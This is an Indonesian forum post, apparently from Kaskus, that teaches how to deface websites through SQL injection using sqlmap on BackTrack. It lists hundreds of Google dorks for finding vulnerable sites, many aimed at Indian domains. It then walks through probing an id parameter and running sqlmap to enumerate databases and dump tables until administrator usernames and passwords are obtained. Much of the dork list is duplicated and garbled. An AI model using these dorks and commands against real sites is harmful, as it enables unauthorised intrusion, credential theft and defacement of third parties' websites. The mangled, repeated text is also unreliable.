- Beranda
- Komunitas
- Tech
- Internet Service & Networking
SQLmap Backtrack
TS
User telah dihapus
SQLmap Backtrack
Halo para sobat KasKuser,...
kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang
dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack.
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
intext:”error in your SQL syntax” +site:in
intext:”mysql_num_rows()” +site:in
intext:”mysql_fetch_array()” +site:in
intext:”Error Occurred While Processing Request” +site:in
intext:”Server Error in ‘/’ Application” +site:in
intext:”Microsoft OLE DB Provider for ODBC Drivers error” +site:in
intext:”Invalid Querystring” +site:in
intext:”OLE DB Provider for ODBC” +site:in
intext:”VBScript Runtime” +site:in
intext:”ADODB.Field” +site:in
intext:”BOF or EOF” +site:in
intext:”ADODB.Command” +site:in
intext:”JET Database” +site:in
intext:”mysql_fetch_row()” +site:in
intext:”Syntax error” +site:in
intext:”include()” +site:in
intext:”mysql_fetch_assoc()” +site:in
intext:”mysql_fetch_object()” +site:in
intext:”mysql_numrows()” +site:in
intext:”GetArray()” +site:in
intext:”FetchRow()” +site:in
intext:”Input string was not in a correct format” +site:in
inurl:/general.php?*id=*
inurl:/careers-detail.asp?id=
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurl
roduct.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=
inurl:/Details.asp?id=
intext:"Powered By : SE Software Technologies" filetypehp
inurl:/index.php?pgId=
inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"
inurl:/dosearch.asp?
inurl:/details.php?linkid=
inurl:/viewfaqs.php?cat=
inurl:/calendar.php?token=
inurl:/games.php?id= "Powered by PHPD Game Edition"
inurl:/gmap.php?id=
allinurl:*.php?txtCodiInfo=
inurl:/notizia.php?idArt=
inurl:read.php?=
inurl:"ViewerFrame?Mode="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl
.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl
gl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
intitle:axis intitle:"video server"
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
"intitle:index of"
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*
*=
info.php?strona=
template.php?str=
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan
menambahkan tanda - (minus) sebelum nomor id tersebut.
Contoh :
[url]http://www.site.com/beritaLengkap.php?id=5''[/url]
[url]http://www.site.com/beritaLengkap.php?id=’5[/url]
http://www.site.com/beritaLengkap.php?id=-5
Jika Target Vuln AKan Muncul Tulisan
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 7"
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian untuk mencari nama database, ketikkan “ ./sqlmap.py -u http:/www.dite.com/contoh.php?id=5 --dbs” (tanpa tanda petik) kemudian Enter.
Setelah kita mendapatkan Database , kita tulis “./sqlmap.py -u http://www.site.com/contoh.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.
Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.ssite.com/contoh.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.site.com/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.
Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut
Tinggal Cari Admin Loginya deh 
kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang
dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack.
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
intext:”error in your SQL syntax” +site:in
intext:”mysql_num_rows()” +site:in
intext:”mysql_fetch_array()” +site:in
intext:”Error Occurred While Processing Request” +site:in
intext:”Server Error in ‘/’ Application” +site:in
intext:”Microsoft OLE DB Provider for ODBC Drivers error” +site:in
intext:”Invalid Querystring” +site:in
intext:”OLE DB Provider for ODBC” +site:in
intext:”VBScript Runtime” +site:in
intext:”ADODB.Field” +site:in
intext:”BOF or EOF” +site:in
intext:”ADODB.Command” +site:in
intext:”JET Database” +site:in
intext:”mysql_fetch_row()” +site:in
intext:”Syntax error” +site:in
intext:”include()” +site:in
intext:”mysql_fetch_assoc()” +site:in
intext:”mysql_fetch_object()” +site:in
intext:”mysql_numrows()” +site:in
intext:”GetArray()” +site:in
intext:”FetchRow()” +site:in
intext:”Input string was not in a correct format” +site:in
inurl:/general.php?*id=*
inurl:/careers-detail.asp?id=
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurl
roduct.php?mid=inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=
inurl:/Details.asp?id=
intext:"Powered By : SE Software Technologies" filetype
hpinurl:/index.php?pgId=
inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"
inurl:/dosearch.asp?
inurl:/details.php?linkid=
inurl:/viewfaqs.php?cat=
inurl:/calendar.php?token=
inurl:/games.php?id= "Powered by PHPD Game Edition"
inurl:/gmap.php?id=
allinurl:*.php?txtCodiInfo=
inurl:/notizia.php?idArt=
inurl:read.php?=
inurl:"ViewerFrame?Mode="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl
lay_old.php?id=inurl:declaration_more.php?decl_id=
inurl
ageid=inurl
.php?id=inurl
age.php?file=inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl
roduct-item.php?id=inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl
gl_inet.php?ogl_id=inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl
review.php?id=inurl:loadpsb.php?id=
inurl
pinions.php?id=inurl:spr.php?id=
inurl
ages.php?id=inurl:announce.php?id=
inurl:clanek.php4?id=
inurl
articipant.php?id=inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl
rod_detail.php?id=inurl:viewphoto.php?id=
inurl:article.php?id=
inurl
erson.php?id=inurl
roductinfo.php?id=inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl
rofile_view.php?id=inurl:category.php?id=
inurl
ublications.php?id=inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl
rod_info.php?id=inurl:shop.php?do=part&id=
inurl
roductinfo.php?id=inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl
roduct.php?id=inurl:releases.php?id=
inurl:ray.php?id=
inurl
roduit.php?id=inurl
op.php?id=inurl:shopping.php?id=
inurl
roductdetail.php?id=inurl
ost.php?id=inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl
age.php?id=inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl
roduct_ranges_view.php?ID=inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl
roduct-item.php?id=inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl
review.php?id=inurl:loadpsb.php?id=
inurl
ages.php?id=inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl
pinions.php?id=inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl
ffer.php?idf=inurl:art.php?idm=
inurl:title.php?id=
intitle:axis intitle:"video server"
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
"intitle:index of"
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl
lay_old.php?id=inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl
.php?id=inurl
age.php?file=inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl
roduct-item.php?id=inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl
review.php?id=inurl:loadpsb.php?id=
inurl
pinions.php?id=inurl:spr.php?id=
inurl
ages.php?id=inurl:announce.php?id=
inurl:clanek.php4?id=
inurl
articipant.php?id=inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl
rod_detail.php?id=inurl:viewphoto.php?id=
inurl:article.php?id=
inurl
erson.php?id=inurl
roductinfo.php?id=inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl
rofile_view.php?id=inurl:category.php?id=
inurl
ublications.php?id=inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl
rod_info.php?id=inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl
roduct.php?id=inurl:releases.php?id=
inurl:ray.php?id=
inurl
roduit.php?id=inurl
op.php?id=inurl:shopping.php?id=
inurl
roductdetail.php?id=inurl
ost.php?id=inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl
age.php?id=inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl
roduct_ranges_view.php?ID=inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
